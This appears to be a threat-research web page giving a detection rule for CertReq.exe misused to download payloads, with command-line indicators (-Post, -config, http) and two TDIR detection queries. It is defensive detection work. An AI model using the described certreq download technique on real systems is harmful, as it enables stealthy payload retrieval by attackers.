Suspicious CertReq Command to Download

    Friday, November 7, 2025 In: Threat Research Print

    Date: 11/07/2025

    Severity: High

    Summary

    Detects a suspicious CertReq execution that initiates a file download. This activity is commonly associated with attackers attempting to retrieve additional payloads or configuration files. CertReq is a legitimate Windows utility designed to request and obtain certificates from a Certification Authority (CA); however, it can be misused by threat actors as a living-off-the-land (LotL) technique to facilitate malicious downloads.

    Indicators of Compromise (IOC) List

    Image : 

    certreq.exe

    OriginalFileName : 

    CertReq.exe

    CommandLine : 

    -Post

    -config

    http

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query  1:

    (resourcename = "Windows Security" AND eventtype = "4688") AND (processname like "certreq.exe" AND Originalfilename like "CertReq.exe") AND (commandline like "-Post") AND (commandline like "-config") AND (commandline like "http")

    Detection Query 2 :

    (technologygroup = "EDR") AND (processname like "certreq.exe" AND Originalfilename like "CertReq.exe") AND (commandline like "-Post") AND (commandline like "-config") AND (commandline like "http")

    Reference:    

    https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_certreq_download.yml


    Tags

    Threat ActorCertReqliving off the land (LOTL)Sigma

    « Previous Article

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2025 by Gurucul - All rights reserved.